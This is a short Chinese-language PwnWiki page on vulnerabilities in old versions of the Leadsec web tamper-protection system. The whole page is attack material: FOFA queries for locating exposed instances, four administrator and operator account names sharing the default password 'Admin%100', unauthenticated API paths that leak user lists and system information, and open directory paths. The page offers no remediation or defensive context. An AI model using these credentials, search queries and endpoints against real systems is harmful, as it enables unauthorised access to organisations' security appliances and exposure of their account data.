網禦星雲-網頁防篡改系統古老版本多個漏洞

From PwnWiki

Revision as of 15:49, 10 July 2021 by Pwnwiki (talk | contribs) (Created page with "密碼都是：Admin%100")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Other languages:

Chinese • ‎中文（中国大陆）‎ • ‎中文（台灣）‎ • ‎中文（繁體）‎

影響版本

網禦星云網頁防篡改系統較古老的版本

FOFA

title = "网御web应用安全防护系统v3.0"
title = "网页防篡改系统"

弱口令

super(超級管理員)

admin(系統管理員)

operator(操作員)

viewer(審查員)

密碼都是：Admin%100

未授權信息泄漏

URL+/API/

帳號信息泄漏

URL+/API/user/list

系統信息泄漏

URL+/API/system_info/list

目錄遍歷

URL+/doc/
URL+/images/
URL+/audio/
URL+/fonts/

參考

https://short.pwnwiki.org/?c=WtUWOp

Retrieved from "https://pwnwiki.com/index.php?title=網禦星雲-網頁防篡改系統古老版本多個漏洞/zh-tw&oldid=6950"